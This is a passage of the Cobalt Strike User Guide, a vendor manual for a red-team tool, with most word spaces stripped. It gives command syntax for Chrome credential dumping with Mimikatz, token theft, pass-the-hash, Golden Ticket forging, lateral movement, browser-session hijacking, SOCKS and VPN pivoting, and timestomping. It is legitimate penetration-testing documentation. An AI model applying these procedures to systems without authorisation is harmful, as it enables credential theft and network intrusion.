togettheirhashonly.Thiscommandrequiresadomainadministratortrustrelationship.
|
||
CobaltStrikeUserGuide www.fortra.com page:107
|
||
|
||
PostExploitation/PortScanning
|
||
Usechromedump [pid] [arch]toinjectintothespecifiedprocesstorecovercredentialmaterial
|
||
fromGoogleChrome.Usechromedump(without[pid]and[arch]arguments)tospawna
|
||
temporaryprocesstorecovercredentialmaterialfromGoogleChrome.Thiscommandwilluse
|
||
Mimikatztorecoverthecredentialmaterialandshouldberununderausercontext.
|
||
CredentialsdumpedwiththeabovecommandsarecollectedbyCobaltStrikeandstoredinthe
|
||
credentialsdatamodel.GotoView ->Credentials topullupthecredentialsonthecurrentteam
|
||
server.
|
||
Port Scanning
|
||
Beaconhasabuiltinportscanner.Useportscan [pid] [arch] [targets] [ports] [arp|icmp|none]
|
||
[max connections]toinjectintothespecifiedprocesstorunaportscanagainstthespecified
|
||
hosts.Useportscan [targets] [ports] [arp|icmp|none] [max connections](without[pid]and
|
||
[arch]arguments)tospawnatemporaryprocesstorunaportscanagainstthespecifiedhosts.
|
||
The[targets]optionisacommaseparatedlistofhoststoscan.Youmayalso
|
||
specifyIPv4addressranges(e.g.,192.168.1.128-192.168.2.240,192.168.1.0/24)
|
||
The[ports]optionisacommaseparatedlistorportstoscan.Youmayspecifyport
|
||
rangesaswell(e.g.,1-65535)
|
||
The[arp|icmp|none]targetdiscoveryoptionsdictatehowtheportscanningtoolwill
|
||
determineifahostisalive.TheARPoptionusesARPtoseeifasystemrespondsto
|
||
thespecifiedaddress.TheICMPoptionsendsanICMPechorequest.Thenone
|
||
optiontellstheportscantooltoassumeallhostsarealive.
|
||
The[max connections]optionlimitshowmanyconnectionstheportscantoolwill
|
||
attemptatanyonetime.TheportscantoolusesasynchronousI/Oandit'sableto
|
||
handlealargenumberofconnectionsatonetime.Ahighervaluewillmakethe
|
||
portscangomuchfaster.Thedefaultis1024.
|
||
Theportscannerwillrun,inbetweenBeaconcheckins.Whenithasresultstoreport,itwillsend
|
||
themtotheBeaconconsole.CobaltStrikewillprocessthisinformationandupdatethetargets
|
||
modelwiththediscoveredhosts.
|
||
Youcanalsogoto[beacon] -> Explore -> Port Scannertolaunchtheportscannertool.
|
||
Network and Host Enumeration
|
||
Beacon’snetmoduleprovidestoolstointerrogateanddiscovertargetsinaWindowsactive
|
||
directorynetwork.
|
||
CobaltStrikeUserGuide www.fortra.com page:108
|
||
|
||
PostExploitation/TrustRelationships
|
||
Usenet [pid] [arch] [command] [arguments]toinjectthenetworkandhostenumerationtool
|
||
intothespecifiedprocess.Usenet [command] [arguments](without[pid]and[arch]
|
||
arguments)tospawnatemporaryprocessandinjectthenetworkandhostenumerationtool
|
||
intoit.Anexceptionisthenet domaincommandwhichisimplementedasaBOF.netdomain.
|
||
ThecommandsinBeacon’snetmodulearebuiltontopoftheWindowsNetworkEnumeration
|
||
APIs.Mostofthesecommandsaredirectreplacementsformanyofthebuilt-innetcommands
|
||
inWindows(therearealsoafewuniquecapabilitieshereaswell).Thefollowingcommandsare
|
||
available:
|
||
computers-listshostsinadomain(groups)
|
||
dclist-listsdomaincontrollers.(populatesthetargetsmodel)
|
||
domain-displaydomainforthishost
|
||
domain_controllers-listsDCsinadomain(groups)
|
||
domain_trusts-listsdomaintrusts
|
||
group-listsgroupsandusersingroups
|
||
localgroup-listslocalgroupsandusersinlocalgroups.(greatduringlateralmovementwhen
|
||
youhavetofindwhoisalocaladminonanothersystem).
|
||
logons-listsusersloggedontoahost
|
||
sessions-listssessionsonahost
|
||
share-listssharesonahost
|
||
user-listsusersanduserinformation
|
||
time-showtimeforahost
|
||
view-listshostsinadomain(browserservice).(populatesthetargetsmodel)
|
||
Trust Relationships
|
||
TheheartofWindowssinglesign-onistheaccesstoken.WhenauserlogsontoaWindows
|
||
host,anaccesstokenisgenerated.Thistokencontainsinformationabouttheuserandtheir
|
||
rights.Theaccesstokenalsoholdsinformationneededtoauthenticatethecurrentuserto
|
||
anothersystemonthenetwork.ImpersonateorgenerateatokenandWindowswilluseits
|
||
informationtoauthenticatetoanetworkresourceforyou.
|
||
CobaltStrikeUserGuide www.fortra.com page:109
|
||
|
||
PostExploitation/TrustRelationships
|
||
Usesteal_token [pid]orsteal_token [pid] <OpenProcessToken access mask>tostealan
|
||
accesstokenfromanexistingprocess.
|
||
Token Store
|
||
Thetokenstorefacilitateshot-swappableaccesstokens.Usetoken-store steal [pid,...]
|
||
<OpenProcessToken access mask>tostealanaccesstokenandstoreit.Toimmediately
|
||
applythestolentoken,usetoken-store steal-and-use [pid] <OpenProcessToken access
|
||
mask>.
|
||
Thetoken-store showcommandliststheaccesstokenscurrentlyavailableinthetokenstore.
|
||
Usetoken-store use [id]toapplyanaccesstokentothecurrentBeacon.
|
||
token-store remove [id,...]andtoken-store remove-allcommandscanbeusedtoremove
|
||
storedtokensfromthestore.
|
||
Ifyou’dliketoseewhichprocessesarerunninguseps.Thegetuidcommandwillprintyour
|
||
currenttoken.Userev2selftorevertbacktoyouroriginaltoken.
|
||
OpenProcessTokenaccessmasksuggestedvalues:
|
||
blank = default (TOKEN_ALL_ACCESS)
|
||
0 = TOKEN_ALL_ACCESS
|
||
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY
|
||
(1+2+8)
|
||
Access mask values:
|
||
STANDARD_RIGHTS_REQUIRED . . . . : 983040
|
||
TOKEN_ASSIGN_PRIMARY . . . . . . : 1
|
||
TOKEN_DUPLICATE . . . . . . . . : 2
|
||
TOKEN_IMPERSONATE . . . . . . . : 4
|
||
TOKEN_QUERY . . . . . . . . . . : 8
|
||
TOKEN_QUERY_SOURCE . . . . . . . : 16
|
||
TOKEN_ADJUST_PRIVILEGES . . . . : 32
|
||
TOKEN_ADJUST_GROUPS . . . . . . : 64
|
||
TOKEN_ADJUST_DEFAULT . . . . . . : 128
|
||
TOKEN_ADJUST_SESSIONID . . . . . : 256
|
||
NOTE:
|
||
'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing
|
||
'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5)
|
||
CobaltStrikeUserGuide www.fortra.com page:110
|
||
|
||
PostExploitation/LateralMovement
|
||
Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global
|
||
options.
|
||
Ifyouknowcredentialsforauser;usemake_token [DOMAIN\user] [password]togeneratea
|
||
tokenthatpassesthesecredentials.Thistokenisacopyofyourcurrenttokenwithmodified
|
||
singlesign-oninformation.Itwillshowyourcurrentusername.Thisisexpectedbehavior.
|
||
TheBeaconcommandpth [pid] [arch] [DOMAIN\user] [ntlm hash]injectsintothespecified
|
||
processtogenerateANDimpersonateatoken.Usepth [DOMAIN\user] [ntlm hash](without
|
||
[pid]and[arch]arguments)tospawnatemporaryprocesstogenerateANDimpersonatea
|
||
token.ThiscommandusesmimikatztogenerateANDimpersonateatokenthatusesthe
|
||
specifiedDOMAIN,user,andNTLMhashassinglesign-oncredentials.Beaconwillpassthis
|
||
hashwhenyouinteractwithnetworkresources.
|
||
Beacon’sMakeTokendialog([beacon]->Access->Make Token)isafront-endforthese
|
||
commands.Itwillpresentthecontentsofthecredentialmodelanditwillusetheright
|
||
commandtoturntheselectedcredentialentryintoanaccesstoken.
|
||
Kerberos Tickets
|
||
AGoldenTicketisaself-generatedKerberosticket.It'smostcommontoforgeaGoldenTicket
|
||
withDomainAdministratorrights
|
||
Goto[beacon]->Access->Golden TickettoforgeaGoldenTicketfromCobaltStrike.Provide
|
||
thefollowingpiecesofinformationandCobaltStrikewillusemimikatztogenerateaticketand
|
||
injectitintoyourkerberostray:
|
||
1. Theuseryouwanttoforgeaticket.
|
||
2. Thedomainyouwanttoforgeaticketfor.
|
||
3. Thedomain'sSID
|
||
4. TheNTLMhashofthekrbtgtuseronadomaincontroller.
|
||
Usekerberos_ticket_use [/path/to/ticket]toinjectaKerberosticketintothecurrentsession.
|
||
ThiswillallowBeacontointeractwithremotesystemsusingtherightsinthisticket.
|
||
Usekerberos_ticket_purgetoclearanyKerberosticketsassociatedwithyoursession.
|
||
Lateral Movement
|
||
Onceyouhaveatokenforadomainadminoradomainuserwhoisalocaladminonatarget,
|
||
youmayabusethistrustrelationshiptogetcontrolofthetarget.CobaltStrike’sBeaconhas
|
||
severalbuilt-inoptionsforlateralmovement.
|
||
CobaltStrikeUserGuide www.fortra.com page:111
|
||
|
||
PostExploitation/LateralMovementGUI
|
||
Typejump tolistlateralmovementoptionsregisteredwithCobaltStrike.Runjump [module]
|
||
[target] [listener] toattempttorunapayloadonaremotetarget.
|
||
Jump Module Arch Description
|
||
psexec x86 UseaservicetorunaServiceEXEartifact
|
||
psexec64 x64 UseaservicetorunaServiceEXEartifact
|
||
psexec_psh x86 UseaservicetorunaPowerShellone-liner
|
||
winrm x86 RunaPowerShellscriptviaWinRM
|
||
winrm64 x64 RunaPowerShellscriptviaWinRM
|
||
Runremote-exec,byitself,tolistremoteexecutionmodulesregisteredwithCobaltStrike.Use
|
||
remote-exec [module] [target] [command + args] toattempttorunthespecifiedcommand
|
||
onaremotetarget.
|
||
Remote-exec Module Description
|
||
psexec RemoteexecuteviaServiceControl
|
||
Manager
|
||
winrm RemoteexecuteviaWinRM
|
||
(PowerShell)
|
||
wmi RemoteexecuteviaWMI
|
||
Lateralmovementisanarea,similartoprivilegeescalation,wheresomeattackspresenta
|
||
naturalsetofprimitivestospawnasessiononaremotetarget.Someattacksgiveanexecute-
|
||
primitiveonly.Thesplitbetweenjumpandremote-execgivesyouflexibilitytodecidehowto
|
||
weaponizeanexecute-onlyprimitive.
|
||
AggressorScripthasanAPItoaddnewmodulestojumpandremote-exec.SeetheAggressor
|
||
Scriptdocumentation(theBeaconchapter,specifically)formoreinformation.
|
||
Lateral Movement GUI
|
||
CobaltStrikealsoprovidesaGUItomakelateralmovementeasier.SwitchtotheTargets
|
||
VisualizationorgotoView ->Targets.Navigateto[target] ->Jump andchooseyourdesired
|
||
lateralmovementoption.
|
||
Thefollowingdialogwillopen:
|
||
CobaltStrikeUserGuide www.fortra.com page:112
|
||
|
||
PostExploitation/BeaconDataStore
|
||
figure60-LateralMovementDialog
|
||
Tousethisdialog:
|
||
First,decidewhichtrustyouwanttouseforlateralmovement.Ifyouwanttousethetokenin
|
||
oneofyourBeacons,checktheUsesession’scurrentaccesstokenbox.Ifyouwanttouse
|
||
credentialsorhashesforlateralmovement—that’sOKtoo.Selectcredentialsfromthe
|
||
credentialstoreorpopulatetheUser,Password,andDomainfields.Beaconwillusethis
|
||
informationtogenerateanaccesstokenforyou.Keepinmind,youneedtooperatefromahigh
|
||
integritycontext[administrator]forthistowork.
|
||
Next,choosethelistenertouseforlateralmovement.TheSMBBeaconisusuallyagood
|
||
candidatehere.
|
||
Last,selectwhichsessionyouwanttoperformthelateralmovementattackfrom.Cobalt
|
||
Strike’sasynchronousmodelofoffenserequireseachattacktoexecutefromacompromised
|
||
system.
|
||
ThereisnooptiontoperformthisattackwithoutaBeaconsessiontoattackfrom.Ifyou’reon
|
||
aninternalengagement,considerhookingaWindowssystemthatyoucontrolandusethatas
|
||
yourstartingpointtoattackothersystemswithcredentialsorhashes.
|
||
PressLaunch.CobaltStrikewillactivatethetabfortheselectedBeaconandissuecommands
|
||
toit.FeedbackfromtheattackwillshowupintheBeaconconsole.
|
||
Beacon Data Store
|
||
CobaltStrikeUserGuide www.fortra.com page:113
|
||
|
||
PostExploitation/OtherCommands
|
||
BeaconDataStoreenablesanoperatortostoreBeaconObjectFiles(BOFs)and.NET
|
||
assembliesinBeacon'smemory.Thesestoreditemscansubsequentlybeexecutedmultiple
|
||
timeswithoutresendingtheitem.TheCobaltStrikeclientautomaticallydetectswhetheran
|
||
objecttobeexecutedisalreadystoredinthedatastore.Thestoredentriesaremaskedby
|
||
default,andtheitemisunmaskedonlywhenitisused.
|
||
InadditiontoBeaconObjectFilesand.NETassemblies,itispossibletostoregenericfilesinthe
|
||
datastore,andthesefilescanbeaccessedfromwithinBOFs.Furtherdetailscanbefoundon
|
||
theBOFCAPIpage.
|
||
Thedefaultsizeofthedatastoreis16entries,butyoucanmodifythissizebyconfiguringthe
|
||
data_store_sizeoptionwithinthestageblockofaC2profile.
|
||
Thedata-store load [bof|dotnet|file] <name> [file path]commandstoresaniteminthestore.
|
||
Ifthenameargumentisnotprovided,thenthefilenameisused.
|
||
Thedata-store unload [index]removesthestoreditem.
|
||
Thedata-store listliststheitemscurrentlyavailableinthedatastore.
|
||
Other Commands
|
||
Beaconhasafewothercommandsnotcoveredabove.
|
||
TheclearcommandwillclearBeacon'stasklist.Usethisifyoumakeamistake.
|
||
TypeexittoaskBeacontoexit.
|
||
Usekill [pid]toterminateaprocess.
|
||
UsetimestomptomatchtheModified,Accessed,andCreatedtimesofonefiletothoseof
|
||
anotherfile.
|
||
CobaltStrikeUserGuide www.fortra.com page:114
|
||
|
||
BrowserPivoting/Overview
|
||
Browser Pivoting
|
||
MalwarelikeZeusanditsvariantsinjectthemselvesintoauser’sbrowsertostealbanking
|
||
information.Thisisaman-in-the-browserattack.So-called,becausetheattackerisinjecting
|
||
malwareintothetarget’sbrowser.
|
||
Overview
|
||
Man-in-the-browsermalwareusestwoapproachestostealbankinginformation.Theyeither
|
||
captureformdataasit’ssenttoaserver.Forexample,malwaremighthookPR_WriteinFirefox
|
||
tointerceptHTTPPOSTdatasentbyFirefox.Or,theyinjectJavaScriptontocertainwebpages
|
||
tomaketheuserthinkthesiteisrequestinginformationthattheattackerneeds.
|
||
CobaltStrikeoffersathirdapproachforman-in-the-browserattacks.Itletstheattackerhijack
|
||
authenticatedwebsessions—allofthem.Onceauserlogsontoasite,anattackermayaskthe
|
||
user’sbrowsertomakerequestsontheirbehalf.Sincetheuser’sbrowserismakingtherequest,
|
||
itwillautomaticallyre-authenticatetoanysitetheuserisalreadyloggedonto.Icallthisa
|
||
browserpivot—becausetheattackerispivotingtheirbrowserthroughthecompromiseduser’s
|
||
browser.
|
||
figure61-BrowserPivotinginAction
|
||
CobaltStrike’simplementationofbrowserpivotingforInternetExplorerinjectsanHTTPproxy
|
||
serverintothecompromiseduser’sbrowser.Donotconfusethiswithchangingtheuser’sproxy
|
||
settings.Thisproxyserverdoesnotaffecthowtheusergetstoasite.Rather,thisproxyserver
|
||
isavailabletotheattacker.Allrequeststhatcomethroughitarefulfilledbytheuser’sbrowser.
|
||
CobaltStrikeUserGuide www.fortra.com page:115
|
||
|
||
BrowserPivoting/Setup
|
||
Setup
|
||
TosetupBrowserpivoting,goto[beacon] ->Explore ->Browser Pivot.ChoosetheInternet
|
||
Explorerinstancethatyouwanttoinjectinto.Youmayalsodecidewhichporttobindthe
|
||
browserpivotingproxyservertoaswell.
|
||
figure62-StartaBrowserPivot
|
||
Bewarethattheprocessyouinjectintomattersagreatdeal.InjectintoInternetExplorerto
|
||
inheritauser’sauthenticatedwebsessions.ModernversionsofInternetExplorerspawneach
|
||
tabinitsownprocess.IfyourtargetusesamodernversionofInternetExplorer,youmustinject
|
||
aprocessassociatedwithanopentabtoinheritsessionstate.Whichtabprocessdoesn’t
|
||
matter(childtabssharesessionstate).
|
||
IdentifyInternetExplorertabprocessesbylookingatthePPIDvalueintheBrowserPivoting
|
||
setupdialog.IfthePPIDreferencesexplorer.exe,theprocessisnotassociatedwithatab.Ifthe
|
||
PPIDreferencesiexplore.exe,theprocessisassociatedwithatab.CobaltStrikewillshowa
|
||
checkmarknexttotheprocessesitthinksyoushouldinjectinto.
|
||
OnceBrowserPivotingissetup,setupyourwebbrowsertousetheBrowserPivotProxyserver.
|
||
Remember,CobaltStrike’sBrowserPivotserverisanHTTPproxyserver.
|
||
CobaltStrikeUserGuide www.fortra.com page:116
|
||
|
||
BrowserPivoting/Use
|
||
figure63-ConfigureBrowserSettings
|
||
Use
|
||
Youmaybrowsethewebasyourtargetuseroncebrowserpivotingisstarted.Bewarethatthe
|
||
browserpivotingproxyserverwillpresentitsSSLcertificateforSSL-enabledwebsitesyouvisit.
|
||
Thisisnecessaryforthetechnologytowork.
|
||
Thebrowserpivotingproxyserverwillaskyoutoaddahosttoyourbrowser’struststorewhen
|
||
itdetectsanSSLerror.AddthesehoststothetruststoreandpressrefreshtomakeSSL
|
||
protectedsitesloadproperly.
|
||
Ifyourbrowserpinsthecertificateofatargetsite,youmayfinditsimpossibletogetyour
|
||
browsertoacceptthebrowserpivotingproxyserver’sSSLcertificate.Thisisapain.Oneoption
|
||
istouseadifferentbrowser.TheopensourceChromiumbrowserhasacommand-lineoption
|
||
toignoreallcertificateerrors.Thisisidealforbrowserpivotinguse:
|
||
chromium --ignore-certificate-errors --proxy-server=[host]:[port]
|
||
TheabovecommandisavailablefromView ->Proxy Pivots.HighlighttheBrowserPivotHTTP
|
||
ProxyentryandpressTunnel.
|
||
TostoptheBrowserPivotproxyserver,typebrowserpivot stop initsBeaconconsole.
|
||
CobaltStrikeUserGuide www.fortra.com page:117
|
||
|
||
BrowserPivoting/HowBrowserPivotingWorks
|
||
Youwillneedtoreinjectthebrowserpivotproxyserveriftheuserclosesthetabyou’reworking
|
||
from.TheBrowserPivottabwillwarnyouwhenitcan’tconnecttothebrowserpivotproxy
|
||
serverinthebrowser.
|
||
NOTE:
|
||
OpenJDK11hasaTLSimplementationbugthatcausesERR_SSL_PROTOCOL_ERROR
|
||
(Chrome/Chromium)andSSL_ERROR_RX_RECORD_TOO_LONG(Firefox)wheninteracting
|
||
withhttps://sites.Ifyouencountertheseerrors--downgradeyourteamservertoOracle
|
||
Java1.8orOpenJDK10.
|
||
How Browser Pivoting Works
|
||
InternetExplorerdelegatesallofitscommunicationtoalibrarycalledWinINet.Thislibrary,
|
||
whichanyprogrammayuse,managescookies,SSLsessions,andserverauthenticationforits
|
||
consumers.CobaltStrike’sBrowserPivotingtakesadvantageofthefactthatWinINet
|
||
transparentlymanagesauthenticationandreauthenticationonaperprocessbasis.
|
||
ByinjectingCobaltStrike’sBrowserPivotingtechnologyintoauser’sInternetExplorerinstance,
|
||
yougetthistransparentreauthenticationforfree.
|
||
CobaltStrikeUserGuide www.fortra.com page:118
|
||
|
||
Pivoting/WhatisPivoting
|
||
Pivoting
|
||
What is Pivoting
|
||
Pivoting,forthesakeofthismanual,isturningacompromisedsystemintoahoppointforother
|
||
attacksandtools.CobaltStrike’sBeaconprovidesseveralpivotingoptions.Foreachofthese
|
||
options,youwillwanttomakesureyourBeaconisininteractivemode.Interactivemodeis
|
||
whenaBeaconchecksinmultipletimeseachsecond.Usethesleep 0 commandtoputyour
|
||
Beaconintointeractivemode.
|
||
SOCKS Proxy
|
||
Goto[beacon] ->Pivoting ->SOCKS Server tosetupaSOCKS4orSOCKS5proxyserveron
|
||
yourteamserver.Or,usesocks 8080 tosetupaSOCKSproxyserveronport8080(oranyother
|
||
portyouchoose).
|
||
AllconnectionsthatgothroughtheseSOCKSserversturnintoconnect,read,write,andclose
|
||
tasksfortheassociatedBeacontoexecute.YoumaytunnelviaSOCKSthroughanytypeof
|
||
Beacon(evenanSMBBeacon).
|
||
Beacon’sHTTPdatachannelisthemostresponsiveforpivotingpurposes.Ifyou’dliketopivot
|
||
trafficoverDNS,usetheDNSTXTrecordcommunicationmode.
|
||
Usesocks [port] [socks4 | socks5] [enableNoAuth | disableNoAuth] [user] [password]
|
||
[enableLogging | disableLogging]tostartaSOCKS4a(bydefaultwhennoserverversionis
|
||
specified)orSOCKS5serveronthespecifiedport.Thisserverwillrelayconnectionsthrough
|
||
thisBeacon.
|
||
SOCKS5serverscanbeconfiguredwithNoAuthauthentication(default),User/Password
|
||
authentication,andsomeadditionallogging.
|
||
SOCKS5ServerscurrentlydonotsupportGSSAPIauthenticationandIPV6.
|
||
ToseetheSOCKSserversthatarecurrentlysetup,gotoView ->Proxy Pivots.
|
||
Usesocks stoptostoptheSOCKSserversandterminateexistingconnections.
|
||
TrafficwillnotrelaywhileBeaconisasleep.Changethesleeptimewiththesleepcommandto
|
||
reducelatency.
|
||
Proxychains
|
||
CobaltStrikeUserGuide www.fortra.com page:119
|
||
|
||
Pivoting/ReversePortForward
|
||
TheproxychainstoolwillforceanexternalprogramtouseaSOCKSproxyserverthatyou
|
||
designate.Youmayuseproxychainstoforcethird-partytoolsthroughCobaltStrike’sSOCKS
|
||
server.Tolearnmoreaboutproxychains,visit:http://proxychains.sourceforge.net/
|
||
Metasploit
|
||
YoumayalsotunnelMetasploitFrameworkexploitsandmodulesthroughBeacon.Createa
|
||
BeaconSOCKSproxyserver[asdescribedabove]andpastethefollowingintoyourMetasploit
|
||
Frameworkconsole:
|
||
setg Proxies socks4:team server IP:proxy port
|
||
setg ReverseAllowProxy true
|
||
ThesecommandswillinstructtheMetasploitFrameworktoapplyyourProxiesoptiontoall
|
||
modulesexecutedfromthispointforward.Onceyou’redonepivotingthroughBeaconinthis
|
||
way,useunsetg Proxies tostopthisbehavior.
|
||
Ifyoufindtheabovetoughtoremember,gotoView ->Proxy Pivots.Highlighttheproxypivot
|
||
yousetupandpressTunnel.ThisbuttonwillprovidethesetgProxiessyntaxneededtotunnel
|
||
theMetasploitFrameworkthroughyourBeacon.
|
||
Reverse Port Forward
|
||
Thefollowingcommandsareavailable:
|
||
NOTE:
|
||
Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
|
||
commandnametoseedetailedhelp.
|
||
rportfwd-UsethiscommandtosetupareversepivotthroughBeacon.Therportfwdcommand
|
||
willbindaportonthecompromisedtarget.Anyconnectionstothisportwillcauseyour
|
||
CobaltStrikeservertoinitiateaconnectiontoanotherhostandportandrelaytraffic
|
||
betweenthesetwoconnections.CobaltStriketunnelsthistrafficthroughBeacon.
|
||
Thesyntaxforrportfwdis:rportfwd [bind port] [forward host] [forward port].
|
||
rportfwd_local-UsethiscommandtosetupareversepivotthroughBeaconwithonevariation.
|
||
Thisfeatureinitiatesaconnectiontotheforwardhost/portfromyourCobaltStrikeclient.
|
||
TheforwardedtrafficiscommunicatedthroughtheconnectionyourCobaltStrikeclient
|
||
hastoitsteamserver.
|
||
rportfwd stop [bind port]-Usetodisablethereverseportforward.
|
||
CobaltStrikeUserGuide www.fortra.com page:120
|
||
|
||
Pivoting/SpawnandTunnel
|
||
Spawn and Tunnel
|
||
Usethespunnelcommandtospawnathird-partytoolinatemporaryprocessandcreatea
|
||
reverseportforwardforit.Thesyntaxisspunnel [x86 or x64] [controller host] [controller
|
||
port] [/path/to/agent.bin].Thiscommandexpectsthattheagentfileisposition-independent
|
||
shellcode(usuallytherawoutputfromanotheroffenseplatform).Thespunnel_localcommand
|
||
isthesameasspunnel,exceptitinitiatesthecontrollerconnectionfromyourCobaltStrike
|
||
client.Thespunnel_localtrafficiscommunicatedthroughtheconnectionyourCobaltStrike
|
||
clienthastoitsteamserver.
|
||
Agent Deployed:Interoperability with Core Impact
|
||
ThespunnelcommandsweredesignedspecificallytotunnelCoreImpact'sagentthrough
|
||
CobaltStrike'sBeacon.CoreImpactisapenetrationtestingtoolandexploitframeworkalso
|
||
availableforlicensefromFortraathttps://www.coresecurity.com/products/core-impact
|
||
ToexportarawagentfilefromCoreImpact:
|
||
1. ClicktheModules tabintheCoreImpactuserinterface
|
||
2. SearchforPackage and Register Agent
|
||
3. Double-clickthismodule
|
||
4. ChangePlatform toWindows
|
||
5. ChangeArchitecture tox86-64
|
||
6. ChangeBinary Type toraw
|
||
7. ClickTarget File andpress...todecidewheretosavetheoutput.
|
||
8. GotoAdvanced
|
||
9. ChangeEncrypt Code tofalse
|
||
10. GotoAgent Connection
|
||
11. ChangeConnection Method toConnectfrom Target
|
||
12. ChangeConnect Back Hostname to127.0.0.1
|
||
13. ChangePort tosomevalue(e.g.,9000)andrememberit.
|
||
14. PressOK.
|
||
TheabovewillgenerateaCoreImpactagentasarawfile.Youmayusespunnelx64orspunnel_
|
||
localx64torunthisagentandtunnelitbacktoCoreImpact.
|
||
WeoftenuseCobaltStrikeonaninternetreachableinfrastructureandCoreImpactisoftenona
|
||
localWindowsvirtualmachine.It'sforthisreasonwehavespunnel_local.Werecommendthat
|
||
yourunaCobaltStrikeclientfromthesameWindowssystemthatCoreImpactisinstalledonto.
|
||
CobaltStrikeUserGuide www.fortra.com page:121
|
||
|
||
Pivoting/PivotListeners
|
||
Inthissetup,youcanrunspunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin.Oncethe
|
||
connectionismade,youwillhearthefamous"AgentDeployed"wavfile.
|
||
WithanImpactagentontarget,youhavetoolstoescalateprivileges,scanandinformation
|
||
gatherviamanymodules,launchremoteexploits,andchainotherImpactagentsthroughyour
|
||
Beaconconnection.
|
||
Pivot Listeners
|
||
It’sgoodtradecrafttolimitthenumberofdirectconnectionsfromyourtarget’snetworktoyour
|
||
commandandcontrolinfrastructure.Apivotlistenerallowsyoutocreatealistenerthatis
|
||
boundtoaBeaconorSSHsession.Inthisway,youcancreatenewreversesessionswithout
|
||
moredirectconnectionstoyourcommandandcontrolinfrastructure.
|
||
Tosetupapivotlistener,goto[beacon] ->Pivoting ->Listener….Thiswillopenadialogwhere
|
||
youmaydefineanewpivotlistener.
|
||
figure64-ConfigureaPivotListener
|
||
ApivotlistenerwillbindtoListenPortonthespecifiedSession.TheListenHostvalueconfigures
|
||
theaddressyourreverseTCPpayloadwillusetoconnecttothislistener.
|
||
Rightnow,theonlypayloadoptioniswindows/beacon_reverse_tcp.Thisisalistenerwithouta
|
||
stager.Thismeansyoucan’tembedthispayloadintocommandsandautomationthatexpect
|
||
stagers.Youdohavetheoptiontoexportastagelesspayloadartifactandrunittodelivera
|
||
reverseTCPpayload.
|
||
CobaltStrikeUserGuide www.fortra.com page:122
|
||
|
||
Pivoting/CovertVPN
|
||
PivotListenersdonotchangethepivothost’sfirewallconfiguration.Ifapivothosthasahost-
|
||
basedfirewall,thismayinterferewithyourlistener.You,theoperator,areresponsiblefor
|
||
anticipatingthissituationandtakingtherightstepsforit.
|
||
Toremoveapivotlistener,gotoCobalt Strike ->Listeners andremovethelistenerthere.
|
||
CobaltStrikewillsendatasktoteardownthelisteningsocket,ifthesessionisstillreachable.
|
||
Covert VPN
|
||
VPNpivotingisaflexiblewaytotunneltrafficwithoutthelimitationsofaproxypivot.Cobalt
|
||
StrikeoffersVPNpivotingthroughitsCovertVPNfeature.CovertVPNcreatesanetwork
|
||
interfaceontheCobaltStrikesystemandbridgesthisinterfaceintothetarget’snetwork.
|
||
How to Deploy
|
||
ToactivateCovertVPN,right-clickacompromisedhost,goto[beacon] ->Pivoting ->Deploy
|
||
VPN.SelecttheremoteinterfaceyouwouldlikeCovertVPNtobindto.Ifnolocalinterfaceis
|
||
present,pressAdd tocreateone.
|
||
figure65-DeployCovertVPN
|
||
CheckClone host MAC addresstomakeyourlocalinterfacehavethesameMACaddressas
|
||
theremoteinterface.It’ssafesttoleavethisoptionchecked.
|
||
PressDeploy tostarttheCovertVPNclientonthetarget.CovertVPNrequiresAdministrator
|
||
accesstodeploy.
|
||
OnceaCovertVPNinterfaceisactive,youmayuseitlikeanyphysicalinterfaceonyoursystem.
|
||
UseifconfigtoconfigureitsIPaddress.IfyourtargetnetworkhasaDHCPserver,youmay
|
||
requestanIPaddressfromitusingyouroperatingsystemsbuilt-intools.
|
||
CobaltStrikeUserGuide www.fortra.com page:123
|
||
|
||
Pivoting/CovertVPN
|
||
Manage Interfaces
|
||
TomanageyourCovertVPNinterfaces,gotoCobalt Strike ->VPN Interfaces.Here,Cobalt
|
||
StrikewillshowtheCovertVPNinterfaces,howthey’reconfigured,andhowmanybyteswere
|
||
transmittedandreceivedthrougheachinterface.
|
||
HighlightaninterfaceandpressRemove todestroytheinterfaceandclosetheremoteCovert
|
||
VPNclient.CovertVPNwillremoveitstemporaryfilesonrebootanditautomaticallyundoes
|
||
anysystemchangesrightaway.
|
||
PressAdd toconfigureanewCovertVPNinterface.
|
||
figure66-SetupaCovertVPNInterface
|
||
Configure an Interface
|
||
CovertVPNinterfacesconsistofanetworktapandachanneltocommunicateethernetframes
|
||
through.Toconfiguretheinterface,chooseanInterfacename(thisiswhatyouwillmanipulate
|
||
throughifconfiglater)andaMACaddress.
|
||
YoumustalsoconfiguretheCovertVPNcommunicationchannelforyourinterface.CovertVPN
|
||
maycommunicateEthernetframesoveraUDPconnection,TCPconnection,ICMP,orusingthe
|
||
HTTPprotocol.TheTCP(Reverse)channelhasthetargetconnecttoyourCobaltStrike
|
||
instance.TheTCP(Bind)channelhasCobaltStriketunneltheVPNthroughBeacon.
|
||
CobaltStrikewillsetupandmanagecommunicationwiththeCovertVPNclientbasedonthe
|
||
LocalPortandChannelyouselect.
|
||
TheCovertVPNHTTPchannelmakesuseoftheCobaltStrikewebserver.Youmayhostother
|
||
CobaltStrikewebapplicationsandmultipleCovertVPNHTTPchannelsonthesameport.
|
||
CobaltStrikeUserGuide www.fortra.com page:124
|
||
|
||
Pivoting/CovertVPN
|
||
Forbestperformance,usetheUDPchannel.TheUDPchannelhastheleastamountof
|
||
overheadcomparedtotheTCPandHTTPchannels.UsetheICMP,HTTP,orTCP(Bind)
|
||
channelsifyouneedtogetpastarestrictivefirewall.
|
||
WhileCovertVPNhasaflexibilityadvantage,youruseofaVPNpivotoveraproxypivotwill
|
||
dependonthesituation.CovertVPNrequiresAdministratoraccess.Aproxypivotdoesnot.
|
||
CovertVPNcreatesanewcommunicationchannel.Aproxypivotdoesnot.Youshouldusea
|
||
proxypivotinitiallyandmovetoaVPNpivotwhenit’sneeded.
|
||
CobaltStrikeUserGuide www.fortra.com page:125
|
||
|
||
SSHSessions/TheSSHClient
|
||
SSH Sessions
|
||
The SSH Client
|
||
CobaltStrikecontrolsUNIXtargetswithabuilt-inSSHclient.ThisSSHclientreceivestasks
|
||
